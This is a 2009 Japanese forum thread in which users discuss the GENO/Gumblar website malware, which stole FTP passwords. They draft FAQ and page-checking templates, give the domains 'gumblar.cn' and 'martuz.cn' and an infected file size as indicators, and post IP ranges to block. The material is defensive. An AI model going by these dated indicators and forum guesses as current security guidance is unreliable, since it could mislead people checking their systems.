5 >>822
6 >>823 注意書きもう少し分かりやすく直せる方いたらお願いします。

次スレの連番は7です。
流れが早い為、早めに立てた方がいいかも。

すみません。席立ちますので、テンプレ修正訂正して使える部分は使って
次スレで利用してください。

次スレテンプレ貼り終えた後に>>1にアンカーお願いします >>832参照
848GENO:2009/05/17(日) 21:11:13 ID:oUobyklU0
>845
キャンセルするって手もあるけど
やっぱり知らないとそのままアップデートしちゃうと思うし
849GE:2009/05/17(日) 21:11:42 ID:gL3wqKiX0
>>845

カスタムをえらんでIE8インストしなければいいだろうに。
850GENO:2009/05/17(日) 21:12:30 ID:Qe9puDQk0
>>833 >839 >>842
トン
表示については大分焦ってたから多分見逃したんだと思う
とりあえず落ち着きます。本当にありがとう
851GENO:2009/05/17(日) 21:12:44 ID:owV3p7qMO
>>838
マジか自分もだぞ
852GENO:2009/05/17(日) 21:12:59 ID:wa+2yYXB0
★★★スレを見る時に★★★

・レスを読むときは普段の2倍の時間をかけてゆっくり読み、3回読み返せ。
 URLもしかり。踏むまえに一度アドレスを見ろ。

・テンプレ以外のまとめWiki誘導URL等は踏むな。
 踏むまえにアドレスを確認しろ。

・書き込む前に1回深呼吸。脊髄反射/感情的なレスだと感じたら、もう書くな。
 (大抵ほかの奴が同じこと書き込んでる。たとえ注意喚起でも)
853GENO:2009/05/17(日) 21:13:33 ID:uEd/QI2I0
愉快犯とやらは、今まで、ウィルス撒いて逮捕された人間がわんさかいることを知らないぐらいの馬鹿なんだろうな。
854GENO:2009/05/17(日) 21:13:54 ID:5Cm5d2oJ0
まあ直にバスターはIE8にも対応するでしょ
そこまで焦ることではないと思うが
855GENO:2009/05/17(日) 21:13:59 ID:l3+sVDuZ0
>>597 です。
インターネット板のウイルススレでは

>改竄されたsqlsodbc.chmは
>サイズが1.29 KB (1,323 バイト)
>更新日は2009年3月21日

とのことだったのですが、これは
サイズ・更新日でダブルチェックではなく、
サイズが合致していれば黒ということでしょうか。

クリーンインスコか……
856GENO:2009/05/17(日) 21:14:09 ID:nu8RG1Sa0
ここがアホが多いから面白がられてるだけ
857GENO:2009/05/17(日) 21:15:51 ID:FOI08nCn0
>>847>>823テンプレ6;少しでも勘違いを減らす為、サイト→ページとした

6------------------------------------

ページが感染しているかどうかは、ソースをチェックする事で分かります。
ソースのチェック方法は、ご自身の自己判断でお願いします。

以下に紹介するチェックは、大まかな危険を知るためのものです。
特有のコードがあるかどうかのチェックに使いますので、
この結果を見て=即感染と誤認しないようにお願いします。

※アクセスが集中すると、サーバーが重たくなる可能性があります。

●GENOウィルスチェッカー
 http://geno.2ch.tc/

http://wepawet.cs.ucsb.edu/ ソースチェック
 ここで「URL」と書かれている右のフォームに感染が疑われるURLを入力。
 「Resource type」のチェックボックスは「JavaScript/PDF」にチェックを入れ、
 「Submit for analysis」をクリック。
 すると解析結果が出るので、Ctrl+Fをタイプしてページ内を「gumblar.cn」「martuz.cn」で検索。

●ソースチェッカーオンライン(http://so.7walker.net/guide.php )
 右側に表示されるソースを見て、Wikiの「サイト管理人向け」に
 あるようなおかしなコードの有無を調べる。
 ※ソース以外の情報(左下の「安全度」等)は一切無視する。

●手動
 調べたいリンク先を右クリックなどから保存する。
 保存されたHTMLファイルを右クリックなどから
 メモ帳などのテキストエディタで開き、Wikiの「サイト管理人向け」に
 あるようなおかしなコードの有無を調べる。
858geno:2009/05/17(日) 21:16:06 ID:U/BebqKb0
>>855
一番の判断基準はサイズ
更新日はあまり気にしなくてもいい
859GENO:2009/05/17(日) 21:16:08 ID:uEd/QI2I0
面白がってウィルス撒いて、自分が逮捕されちゃ世話ねーべwww
860GENO:2009/05/17(日) 21:16:15 ID:p6BjLk8g0
テンプレも整備が行き届いてるし、律儀に愉快犯は通報されるし
なかなか俺の行きつけの板とは違ってて面白い
86150:2009/05/17(日) 21:16:34 ID:nbm7ZJwf0
>>841
トップを【小林製薬や成美堂出版・旅行代理店等、】
にしたらいいかな?
やっておきます

>>843 追加してきます

>>847 まとめアンカありがとう
最後の行の>1アンカってのは847のレス内容のことなので(わかりにくくてスマン)
次スレ貼り終えた後に>1アンカはいらないですYO!

http://www31.atwiki.jp/doujin_vinfo/pages/27.html
にまとめて載せますので、次スレまでに修正などありましたら
>>1アンカつけて議論してください

(847まで確認)
862GENO:2009/05/17(日) 21:16:51 ID:GEQ8HxWY0
いい加減初心者専用スレが欲しいな
ここが初心者用としていろんな板に張られててアホが増えてるんだろ
863GENO:2009/05/17(日) 21:16:52 ID:A50YHmp70
馬鹿ばっか
864GENO:2009/05/17(日) 21:17:14 ID:l3+sVDuZ0
>>858
ありがとうございます。

いろいろと作業してきます。
865GENO:2009/05/17(日) 21:17:39 ID:uEd/QI2I0
>>862
本来の用途としては、ここは何スレ?
866GEnO:2009/05/17(日) 21:17:54 ID:ycHiX9of0
>>835,838,851
(((゜Д゜)))



samba規制うぜえ死ね
867GENO:2009/05/17(日) 21:18:39 ID:bb/rSAt40
>840
バスター削除・再起動してからカスペルインターネットセキュリティ
2009体験版入れて(この時最新バージョンと定義ファイルの更新が
かかって強制的に再起動を促される)、改めてCドライブ完全スキャン汁
868857:2009/05/17(日) 21:19:55 ID:Sh7hkF2/0
>>1
>>847>>823テンプレ6;少しでも勘違いを減らす為、サイト→ページとした
6------------------------------------

ページが感染しているかどうかは、ソースをチェックする事で分かります。
ソースのチェック方法は、ご自身の自己判断でお願いします。

以下に紹介するチェックは、大まかな危険を知るためのものです。
特有のコードがあるかどうかのチェックに使いますので、
この結果を見て=即感染と誤認しないようにお願いします。

※アクセスが集中すると、サーバーが重たくなる可能性があります。

●GENOウィルスチェッカー
 http://geno.2ch.tc/

http://wepawet.cs.ucsb.edu/ ソースチェック
 ここで「URL」と書かれている右のフォームに感染が疑われるURLを入力。
 「Resource type」のチェックボックスは「JavaScript/PDF」にチェックを入れ、
 「Submit for analysis」をクリック。
 すると解析結果が出るので、Ctrl+Fをタイプしてページ内を「gumblar.cn」「martuz.cn」で検索。

●ソースチェッカーオンライン(http://so.7walker.net/guide.php )
 右側に表示されるソースを見て、Wikiの「サイト管理人向け」に
 あるようなおかしなコードの有無を調べる。
 ※ソース以外の情報(左下の「安全度」等)は一切無視する。

●手動
 調べたいリンク先を右クリックなどから保存する。
 保存されたHTMLファイルを右クリックなどから
 メモ帳などのテキストエディタで開き、Wikiの「サイト管理人向け」に
 あるようなおかしなコードの有無を調べる。
869GENO:2009/05/17(日) 21:21:08 ID:LVavXGx10
IE8じゃなくて火狐使えばよくね?
870GENO:2009/05/17(日) 21:22:43 ID:p6BjLk8g0
Operaだ
871名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 21:22:46 ID:Y2OWqr+80
ノートン先生やくたたないのか?
872GENO:2009/05/17(日) 21:22:57 ID:MmWu1w5h0
俺もFIREFOXデビューするか・・・・
873GENO:2009/05/17(日) 21:22:58 ID:bYT+w3QY0
ウイルス貼ってる馬鹿を通報してくれ
874GENO:2009/05/17(日) 21:23:20 ID:bb/rSAt40
マジレスすると、火狐は初期設定の適切な設定と機能拡張追加そしてその設定も
正しく行えない人にはIEをデフォルトのまま使うより危険。
875GENO:2009/05/17(日) 21:23:46 ID:EubD8DPe0
>840
火狐に汁
テーマでIE8そっくりなのがあるからそれ入れれば使い勝手はIEとかわらんよ
876GENO:2009/05/17(日) 21:24:38 ID:o8b642k80
これを機に無意味な検索避けやオンラインブックマークのこと
自身の行動のありかたについて考える人が少しでも増えてくれるといいな。
877GENO:2009/05/17(日) 21:24:53 ID:eIUS6ttK0
私もIE使ってなくて火狐でNoScript入れているんだが、それでも感染するなら怖いな
サイトの更新もしばらくしない方がよさそうだ
878名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 21:25:27 ID:H9yY4n3h0
やべえ 疲れ目のせいか成美堂踏んじまった
火狐でno script入れててよかたお
879GEnO:2009/05/17(日) 21:25:42 ID:ycHiX9of0
>>874
IEのがよっぽど危険だろ
火狐は攻撃サイトブロックがデフォだぞ
880GENO:2009/05/17(日) 21:25:49 ID:D2qUpqPu0
>>875
ちゃんと使える自信無いから大人しくPCサイトビューアにするわ…
881GENO:2009/05/17(日) 21:25:49 ID:oUobyklU0
火狐が扱いにくそうだと感じたらOperaでもおk
IEコンポーネントだっけ?をつかってるからサイト見るときもIEで見るのと変わらないらしいよ
あとこのスレ的にはOperaのほうがお勧めみたい
882GENO:2009/05/17(日) 21:25:56 ID:yenDHFuc0
>>876
検索除けとオンラインブクマとウィルスに何の関係が?
883GEnO:2009/05/17(日) 21:26:27 ID:ycHiX9of0
>>881
流石同人板だ
どうしようもない糞レスっぷりだな
884げの:2009/05/17(日) 21:26:51 ID:CqbD49hO0
火狐が一番無難?
だがせっかくだから俺はこの赤いOPERAを選ぶぜ!
885geno:2009/05/17(日) 21:27:17 ID:lGE677Mu0
つか企業サイトならともかくサイト持ちでもIEのみ使ってるって理解できん。
標準無視した穴だらけのブラウザなのに。
あんなの基準にサイト作成とかありえない

886GENO:2009/05/17(日) 21:27:34 ID:75zIIRdD0
>>1 >>847>>823>>868テンプレ6 ちょっと気になった真ん中の部分(ソースチェックの箇所)訂正してみました
6------------------------------------
ページが感染しているかどうかは、ソースをチェックする事で分かります。
ソースのチェック方法は、ご自身の自己判断でお願いします。

以下に紹介するチェックは、大まかな危険を知るためのものです。
特有のコードがあるかどうかのチェックに使いますので、
この結果を見て=即感染と誤認しないようにお願いします。

※アクセスが集中すると、サーバーが重たくなる可能性があります。

●GENOウィルスチェッカー
 http://geno.2ch.tc/

●ソースチェック
  http://wepawet.cs.ucsb.edu/
 ここで「URL」と書かれている右のフォームに感染が疑われるURLを入力。
 「Resource type」のチェックボックスは「JavaScript/PDF」にチェックを入れ、
 「Submit for analysis」をクリック。
 すると解析結果が出るので、Ctrl+Fをタイプしてページ内を「gumblar.cn」「martuz.cn」で検索。

●ソースチェッカーオンライン(http://so.7walker.net/guide.php )
 右側に表示されるソースを見て、Wikiの「サイト管理人向け」に
 あるようなおかしなコードの有無を調べる。
 ※ソース以外の情報(左下の「安全度」等)は一切無視する。

●手動
 調べたいリンク先を右クリックなどから保存する。
 保存されたHTMLファイルを右クリックなどから
 メモ帳などのテキストエディタで開き、Wikiの「サイト管理人向け」に
 あるようなおかしなコードの有無を調べる。
887GENO:2009/05/17(日) 21:27:40 ID:aTSY2Ugx0
ここにIEダウングレードの仕方が書いてあります
http://asciidotpc.jp/contents/d3forum/index.php?topic_id=1881
http://snow-white.cocolog-nifty.com/first/2008/08/ie8_beta2_a5d6.html
今試してみています
888名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 21:27:45 ID:067Iz22M0
ID:eGBOhN1B0
ID:ycHiX9of0
何でID変えたの?死ぬの?
889GENO:2009/05/17(日) 21:27:54 ID:p6BjLk8g0
>>883
あ?Operaなめんな
890GENO:2009/05/17(日) 21:28:06 ID:Sh7hkF2/0
>>881
OperaたんはIEコンポーネントなんてものとは無縁です!
891GENO:2009/05/17(日) 21:28:08 ID:nu8RG1Sa0
うわつまんね
892GENO:2009/05/17(日) 21:28:30 ID:oQYQwuuE0
火狐でも絶対大丈夫という保証は無い。最後に頼れるのは自分の注意判断力だけだぞ。
893GENO:2009/05/17(日) 21:29:29 ID:PSz2GGhp0
>>889
operaってIEコンポなのか
恐ろしいな
894GENO:2009/05/17(日) 21:30:12 ID:gjNJYrwK0
>>892
今のところ一番頼れるのはUACだけどね
Windows 7のRC版が6月まで無料で配布されてるはず
895GENO:2009/05/17(日) 21:30:13 ID:28MNX8DRO
サイト持ちでもブラウザとかIEがなんなのかすら知らんやつらがざらにいるからね
最初からパソコンに入ってたから何も考えずIE使ってるんでそ
896geno:2009/05/17(日) 21:30:28 ID:Lmy8/K2O0
オペラがIEコンポ?
独自エンジンでしょ
897テンプレ提案:2009/05/17(日) 21:30:28 ID:quuri9v60
>>819のテンプレのよくある質問
「FTPによる通信」をもうちょっと分かりやすくしたいんだけど

FFFTPやホームページビルダーなどでサイトを更新した時

でいいかな。他に初心者の使うFTPの有名どころある?
898geno:2009/05/17(日) 21:30:40 ID:6cRVu2Q30
ふたばが感染してるって本当?
899GENO:2009/05/17(日) 21:32:03 ID:gD3Q2p120
>>898
デマ
900GENO:2009/05/17(日) 21:32:07 ID:vrGi0nXN0
>>834
うpでーとしてもIE8を避ける方法はある
うpでーとを自動ではなくカスタムにする
詳しくはageるスレの
   ロ グ を 読 め

Microsoft Updateしたらageるスレ 45
http://pc12.2ch.net/test/read.cgi/win/1242060025/
ログを読めば書いてあるからむやみに質問はしない事
901GENO:2009/05/17(日) 21:32:18 ID:IPerXCbT0
Opera最強、とあえてここで呟く
90250:2009/05/17(日) 21:34:17 ID:nbm7ZJwf0
>>886で修正しました
引き続きテンプレ議論どうぞ

ついでに、テンプレ2の

■絵で見て分かる簡単な画像
ttp://ranobe.com/up/src/up360283.jpg

ですが、>>623>>846で言われてることはどうしますか?

(901まで確認)
903同人:2009/05/17(日) 21:37:02 ID:GYRD4iGUO
Acrobat Reader 9.1.1にアップロードしようとしたんだけど
自分8シリーズだった
最新にしたら大丈夫だよね?
904geno:2009/05/17(日) 21:37:05 ID:YTQWI9820
いつの間にかブラウザ論争になってるが
今回問題としているのはデフォでjavascriptを実行する設定にしてるのががまずいってことであって、
ブラウザがどーこーじゃないだろ。
IEでもJavascript切ってりゃマルウェアのコードは実行されないし(今現在は)、
火狐でもJavascript切ってなけりゃダメだろって。
905GENO:2009/05/17(日) 21:37:33 ID:4OQGllW+0
>>885
IEで作ってIEでしか動作確認をしていないIE推奨サイトなんてごろごろしてる
たしか主張バナーもあったぞ
厨はデフォでしか使えないし、自分が標準と居直るものだ
906GENO:2009/05/17(日) 21:37:36 ID:EH9HlHwkO
今ノートン先生使ってるけどこの機会にavast!に変えた方がいいのかな
907GE:2009/05/17(日) 21:38:49 ID:gL3wqKiX0
>>903

とりあえずやっておいたほうがいい。
908GENO:2009/05/17(日) 21:39:34 ID:DqspnPTU0
あのー・・・質問です まさかと思いますが
毎回パソコンをつけるたびにexplorer.exeがなんとかかんとか
出来ませんでした。とかちっちゃいウィンドウが出てパソつけてユーザー開いてすぐ
でるんだけど、まさかなぁ・・・?
確認しても特に何も出なかったんだが・・・偶然か?
909名無しさん:2009/05/17(日) 21:40:27 ID:HQDuSlsR0
株式会社まどか見に行ったらavast!が反応してビクった
910げの:2009/05/17(日) 21:40:41 ID:b1QMgVdp0
スレ流れ早すぎだろ 少し落ち着け

有害IP遮断だったらPeerGuardian2使うのオススメ
FWやルータの設定よりも簡単に出来るし
ルータ・FWとの二重がけにすれば危険度もかなり減ると思う
詳しい使い方はリネージュ資料室でぐぐれ…は危険なので
tp://lineage.paix.jp/
からどぞ


PeerGuardian用のブロックリストも必要ならうpするよ
91150:2009/05/17(日) 21:40:51 ID:cR3gKb45O
>902は

>>623>>646で言われていること

のミスですスマソ
912geno:2009/05/17(日) 21:41:28 ID:jpopUHeK0
>>906
今回の事に限らずだけど
うーん、普通に使うならノートン先生でいいと思う
913GENO:2009/05/17(日) 21:41:49 ID:Sh7hkF2/0
>>908
今回の件と関係あるかどうかは不明だが、異常が起きている
914GENO:2009/05/17(日) 21:42:11 ID:kfrDyruZ0
>>909
何しに行ったの?まどかって真っ黒報告あったんじゃなかったっけ?
915GENO:2009/05/17(日) 21:42:46 ID:jpopUHeK0
>>909
何故行く
916GENO:2009/05/17(日) 21:42:48 ID:z1fSRVRF0
>>909
そりゃ感染済みで報告のあったサイトだからな
917名無しさん:2009/05/17(日) 21:43:17 ID:HQDuSlsR0
>>914
たまたまリンク踏んで警告出て、なんじゃこりゃってことで調べてここに来た。
918GENO1:2009/05/17(日) 21:43:26 ID:5wGg6e3v0
ちょっと確認してきた〜
Internet Explorer 8の対応状況


【対応状況/2009年5月17日時点】
○ Norton Internet Security Online 2009
× ウイルスバスター2008
× ウイルスバスター2009

※ウイルスバスターのバージョン2008および2009は、月額版・90日版を含む

【参照元】
Internet Explorer 8 とノートン製品の互換性(月額サービス・xSP提供版)
ttp://www.symantec.com/ja/jp/norton/support/kb/web_view.jsp?wv_type=public_web&docurl=20090401173729JP&ln=ja_JP
トレンドマイクロ製品における Microsoft Internet Explorer 8 の対応について
ttp://esupport.trendmicro.co.jp/Pages/JP-2064814.aspx
919GENO:2009/05/17(日) 21:44:22 ID:DqspnPTU0
>>913
そして今日突然出なくなったんだが^^;
もう嫌、超怖い
920GENO:2009/05/17(日) 21:44:33 ID:kfrDyruZ0
>>917
はやく確認したほうがいいよ、感染してないかどうか
921GE:2009/05/17(日) 21:45:52 ID:gL3wqKiX0
>>906
ノートンでいいとおもう。

>>908
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1413725244
ここみろ。
922geno:2009/05/17(日) 21:47:05 ID:OdvZzRHc0
>>910
ブロックリスト、是非お願いします!
923GENO:2009/05/17(日) 21:47:13 ID:aTSY2Ugx0
>>887です
無事IE7にダウングレードできました
>>909
google検索も厳禁
925geno:2009/05/17(日) 21:49:47 ID:gh53VpT/O
質問です。


数週間前から、IE・デスクトップ等に関係なく、右クリックやファイルボタンを押した際
普通なら表示されるコピーや張りつけ、新しいフォルダの作成やここにコピーする等の小窓がありますよね?
あれが、外の枠組み(?)だけ半透明に表示され、マウスを小窓があるであろう場所まで持っていかないと
表示すらされない状況になっています。逆に言えば、マウスを持っていった場所のみコピーのような文字が見えます。
言葉だと分かりづらくてすみません。

この現象はこのウイルスが関係しているのでしょうか?
926GENO:2009/05/17(日) 21:50:07 ID:1XXBwaecO
最近の亜種だとcmdもregeditも普通に出来るみたいってのはマジ?
927GENO:2009/05/17(日) 21:50:57 ID:hsx2Qt/b0
>>900
次スレよろしく
928GENO:2009/05/17(日) 21:51:14 ID:25KcJTAx0
>>902
今後変化していくといろいろなおすの大変だし、絵の部分以外なくしちゃったほうがいいのかな?
それともソースチェッカーの所だけ抜けばいいんだろうか
929GENO1:2009/05/17(日) 21:51:25 ID:5wGg6e3v0
>>925
このウイルスとは関係性が浅いかと

パソコンのスペックは足りてる?
メモリとか・・・
930910:2009/05/17(日) 21:52:20 ID:b1QMgVdp0
>>922
おk ちょっと待ってて
931GENO:2009/05/17(日) 21:52:30 ID:SUgho0cI0
まさかとは思いますが、この「GENOウイルス」とは、あなたの想像上の存在にすぎないのでは
ないでしょうか。もしそうだとすれば、あなた自身がセキュ板住人であることに
ほぼ間違いないと思います。
 あるいは、「GENOウイルス」は実在して、しかしここに書かれているような異常な行動は
全く取っておらず、すべてはあなたの妄想という可能性も読み取れます。
この場合も、あなた自身がセキュ板住人であることにほぼ間違いないということになります。
932GE:2009/05/17(日) 21:52:31 ID:gL3wqKiX0
PCのなんでも質問スレになってきてるなw
933ge:2009/05/17(日) 21:54:19 ID:gh53VpT/O
>>929
そういえば先日メモリの残りがどうこうと表示されましたorz
どう調べていいか分からない状況だったので、ネットサーフィン出来ない今のうちにPC内を掃除してみます
本当にありがとうございました!
934GENO:2009/05/17(日) 21:54:26 ID:e03NypW80
>>925
このウイルスとの関係性は薄そうだけど
急にということなら何らかのウイルスに感染してて、
それにリソースやメモリを奪われてる可能性はある
>>1のwikiやこのスレに何度も張られている対処法をよく読んでまずチェックしてみることをお勧めする


というかだんだんパソコンの不調をGENOウイルスのせいにするスレになってきてないか?
935GENO:2009/05/17(日) 21:54:35 ID:l6bsfHqP0
ぐぐれかす
936GENO:2009/05/17(日) 21:55:00 ID:IPerXCbT0
同人関係なくなってきたなwwww
937GENO:2009/05/17(日) 21:55:09 ID:LtET2iGt0
ウイルスセキュリティゼロってここでよく出てるavastとくらべてどっちがいい?
なんか母親がどっちも入れちゃったとか言ってるんだけど、競合するからアウアウだよな?
消したほうがいいんだろうけど、どっちを残すべきなのかよくわからない
938GENO:2009/05/17(日) 21:55:34 ID:aTSY2Ugx0
>>937
スレ違いです
939GENO:2009/05/17(日) 21:56:18 ID:75zIIRdD0
>>900
次スレヨロ
940GENO:2009/05/17(日) 21:56:35 ID:SUgho0cI0
これのせいでニコ動から大量に流れてきてるんだろ。

http://www.nicovideo.jp/watch/nm7062983
941名無しさん:2009/05/17(日) 21:57:01 ID:HQDuSlsR0
>>920
ありがとう、大丈夫だった。
942げの:2009/05/17(日) 21:57:03 ID:x35gg08kO
>>937
うわあ
943GENO:2009/05/17(日) 21:57:32 ID:9MpnOPGl0
>パソコンの不調をGENOウイルスのせいにする
というか良く分からない事をついでに聞いちゃえ的な……

javaスク切ってググレカスでいいんじゃないのもう
944GENO:2009/05/17(日) 21:57:50 ID:hsx2Qt/b0
900不在のようなのでスレたててきます
945GENO:2009/05/17(日) 21:58:00 ID:EH9HlHwkO
>>912>>921
ありがとう。FWでIP遮断はしてるからノートン先生で続けてみるよ
946GENO:2009/05/17(日) 21:58:08 ID:4OQGllW+0
「CDが出てこなくなった。ウイルスのせいですか?」
「さっきキーボードのNがポロリと取れました。ウイルスのせいですか?」
「ログインパスワードを忘れました。ウイルスのせいですか?」

レベルになりそうな悪寒
947テンプレ差し替え1/2:2009/05/17(日) 21:59:32 ID:quuri9v60
テンプレ差し替え、間に合えばテンプレ4に

【よくある質問】

Q:感染するとどうなるの?
A:あなたのパソコンに侵入したウイルスは、
 ホームページビルダーやFFFTPなどでサイトを更新した時
(FTP通信を行った時)にFTPのIDとパスワードを盗みます。
 その後盗んだパスでサイトのソースに悪意を持ったコードが勝手に挿入され、
 そのサイトを見た人を感染させます。
 その他の個人情報が盗まれるのかどうかはまだわかっていません。

Q:ウィルスソフトが反応していないから大丈夫だよね?
A:マルウェアは対策が遅れる事があり、セキュリティソフトも対策が間に合っていない場合があります。
 又、対策したと思われても、亜種が出てくる可能性も常にあります。

Q:VistaとMacは感染しないの?
A:某企業サイトでの発見直後はVista、Macには感染しないと言われています。
 (新種も現れており、100%安心できる状況とは断言出来ません)

Q:〜〜が感染しているって本当??
A:誤報が先走り、実際の感染確認が出ていないケースがたびたびあります。
例)ニフティ(ポータルサイトやスキャンページを見ても問題ないので落ち着いて)

Q:チェッカーの数値が0じゃなかった! 感染!?
A:チェッカーの数値が高くても、ウイルスとは無関係なJavascriptに反応しているだけの場合も有ります 。まずは深呼吸
 >>6の「手動」をよく読んで、安全な手段でソースを確認しましょう 。

948GENO:2009/05/17(日) 21:59:48 ID:fLuBQEIV0
>>946
忘れましたウイルスのせいですかてw幸せな頭だなそれは
949GENO:2009/05/17(日) 21:59:53 ID:gfSPhhas0
早く新型インフルエンザもGENOウイルスも
消えろおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおお
おおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおお
おおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおお
おおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおお
おおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおお
おおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおお
950げの:2009/05/17(日) 22:00:31 ID:o/+pyd2QO
天狗じゃ、天狗の仕業じゃ
951GE:2009/05/17(日) 22:00:47 ID:gL3wqKiX0
>>946

なりつつあるな。
952GENO:2009/05/17(日) 22:00:51 ID:sdqspPrq0
誤クリックでウイルス感染サイトのリンクを踏んだ気が
するんですが、ご飯の写真が載ってるwikiは大丈夫だったのでしょうか
再起動後、おかしな様子もないんですが
953GENO:2009/05/17(日) 22:00:59 ID:D2qUpqPu0
>>944
新スレ乙
954GENO:2009/05/17(日) 22:01:13 ID:kfrDyruZ0
>>941
よかったよかった
955GENO:2009/05/17(日) 22:01:13 ID:7cT0d8kiO
感染してるサイトを日参してたのに自分は感染してなかった…
対策なにもしてないのになんでだ?
956名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 22:01:41 ID:4fKcFs0u0
前に感染したが不調になってリカバリした後にFFFTP使ったから問題ないかな多分
957GENO:2009/05/17(日) 22:01:44 ID:jzAY78qE0
冷蔵庫のヨーグルト食べたら賞味期限一週間過ぎてました。ウイルスのせいですか?
お腹痛くなってきました
958GENO:2009/05/17(日) 22:01:45 ID:QeSUhZD20
>>952
新スレの>>2を見ろカスが
959geno:2009/05/17(日) 22:02:02 ID:ugI/Fqnf0
>>952
聞く前に自分でウイルスチェックするなりなんなりして調べなさい
不安なら、(サイト持ってないこと前提だが)PC消してもう寝なさい
960GENO:2009/05/17(日) 22:02:08 ID:cEoHNwK80
lt;丶`∀´gt; PeerGuardian2 ★ 4 (`ハ´ )
//pc11.2ch.net/test/read.cgi/sec/1228949365/

GENO Virus:78.109.29.112-78.109.29.112
GENO Virus:94.229.65.160-94.229.65.191
GENO Virus:94.247.2.0-94.247.3.255
GENO Virus:95.129.144.0-95.129.145.255
961GENO:2009/05/17(日) 22:02:22 ID:l6bsfHqP0
>>955
ぐぐれかす
962テンプレ差し替え2/2:2009/05/17(日) 22:02:53 ID:quuri9v60
Q:閲覧先のサイトに変なコードがあるんだけど!
A:元々記載されている、広告などの安全なスクリプトの可能性も高いです。まずは落ち着いて。
 >>6の「手動」をよく読んで、wikiの「サイト管理人向け」にあるコードと見比べてください。

Q:とにかく何をしたらいいの?
A:>>2を読んでください。

Q:素人なので、とにかく何もかもが分からない。
A:http://www40.atwiki.jp/gegegeno/
 よく読んで学んでください。

963GENO:2009/05/17(日) 22:02:55 ID:uEd/QI2I0
>>926
自分じゃないが、知人は、プロンプトもレジストリエディタも開いたけど、
sql〜は1300kbぐらいのヤバイサイズだったらしいから、そうかもしれん。

>>931
先生はオカ板から出てきちゃ駄目だw
964GENO:2009/05/17(日) 22:03:17 ID:PSz2GGhp0
>>888
亀だけど
うるせえsambaって書いてあるだろうがヴォケ
965GENO:2009/05/17(日) 22:04:07 ID:e03NypW80
>>957
それはむしろ細菌のせいでしょう
966GENO:2009/05/17(日) 22:04:50 ID:Mk4tVeWS0
>>957
クレームは腸内細菌まで
967910:2009/05/17(日) 22:05:16 ID:b1QMgVdp0
おまたせー
tp://www.rupan.net/uploader/download/1242565049.txt
セキュ板の本スレで貰ったリストに最新の危険IPを追加したよ
任意のフォルダにtxtで保存してPGのリストマネージャで読み込んでね
968GENO:2009/05/17(日) 22:05:51 ID:DqspnPTU0
質問
最近よく突然デスクトップにhs_err_pid3556っていう
メモ帳が勝手に出来るんだけど。これ何?開くと意味不明なのがずら〜り。
969GENO:2009/05/17(日) 22:06:24 ID:eOfZX8dV0
>>968
終わったな
970名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 22:07:24 ID:5sZH/fyG0
>>968
971GENO:2009/05/17(日) 22:08:28 ID:28MNX8DRO
スレ立て乙です

すでにウイルスソフト入ってる人は無理にAVASTに変えなくていいと思う
無料ソフトだから何かあったときのサポートも期待できないし
たいして知識ない人は安易な乗り換えは逆に危険
ウイルスソフト2ついれるなんてもってのほか
972GENO:2009/05/17(日) 22:10:42 ID:xM7ka16XO
同人関係ない写真素材サイトでAVASTに怒られた…
チェッカー1000%で、ソース見た感じ感染してるっぽい
973GENO:2009/05/17(日) 22:10:43 ID:l6bsfHqP0
>>956
ぐぐれかす
PASS変更しろ
974geno:2009/05/17(日) 22:10:49 ID:0tAEYsh+0
>>968
調べれば分かることだからこんなとこで聞いちゃだめだよ
Javaが異常終了した時に作成されるログです
はよ最新のJavaを再インストールして、なおかつ無効にしなさい
975GENO:2009/05/17(日) 22:11:03 ID:woy7n/vkO
連投に引っかかった
誰か新スレに>>886をよろ
976GENO:2009/05/17(日) 22:12:30 ID:28MNX8DRO
>>972
管理人に教えたげて
977GENO:2009/05/17(日) 22:12:35 ID:07dogMtg0
感染してるっぽ;;
sqlsodbc.chmのサイズが1323kとかだ・・・
そういえば4月ごろになにげにURLクリックしたらパソコンの通販ページに
飛んでそれからIEがやけに落ちるようになった
なんかおかしいのでシステムの復元したらなおったんだが
Windows updateが今繋がらない
対処としてはバックアップとってクリーンインストールでいいんだよね?
978GENO:2009/05/17(日) 22:13:09 ID:5D9ja8Zd0
今スティッカムでトロイ検出した、一応注意な
979geno:2009/05/17(日) 22:14:01 ID:U/BebqKb0
>>977
その対処でおk
でも回線切ってからな
980GENO:2009/05/17(日) 22:14:26 ID:JFGNESCq0
>>964
生ゴミ規制おめ!
981944:2009/05/17(日) 22:14:37 ID:t17muLy1O
PC連続規制くらった
残りのテンプレ貼ってくれた人ありがとう

次スレ
ttp://changi.2ch.net/test/read.cgi/doujin/1242565127
982名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 22:15:19 ID:VMJs7OWr0
AdobeReaderを最新版にしたって奴、
バージョン8以下を9にしたから安心してんじゃねーぞ。
9をインスコしてから更にアップデートしないと意味ないからな!
983GENO:2009/05/17(日) 22:15:40 ID:A50YHmp70
とても極端な例になるので、失笑モノかもしれないけど、
例えば最初に感染したパソコンを「親」として考えてみる。
親のHPをサクセスした人数のうちの10人が感染してかつサイト持ちだとする。
10人のアクセスっていうのは、多少人気のあるサイトから考えれば、
そんなに多くない微々たる数字だと思う。
親から感染した10人の「子」、「子」のサイトからもさらに10人ずつ感染したとしたら
10の2乗で100人の「孫」、「孫」のサイトからさらに10人ずつと考えると
10の4乗で10000人の「ひ孫」、「ひ孫」のサイトからさらに・・・
重複だとか考えれば大分人数は減ると思うけど。

感染報告のあったサーチに7000ヒットあったという話だけど、
その7000程の足跡のうち、何人がサイト持ちで
そのうちの何人が対策の万全なPCでアクセスしたか。
対策が万全じゃないPCなんて、10なんてもんじゃないよね?
そう考えると、少しゾッとしない?

って感じに書いてみたら、少しは危機感持ってくれないかな?
極端すぎる話だし、すぐに論破されそうな気もするけど。
984GENO:2009/05/17(日) 22:16:46 ID:8ahxanaL0
pdfファイルなんて殆ど見ないから削除した方が簡単なような
985GENO:2009/05/17(日) 22:16:47 ID:qxKR2Bri0
サクセス・・・?
986GENO:2009/05/17(日) 22:18:17 ID:yKmrVTN+0
>>983
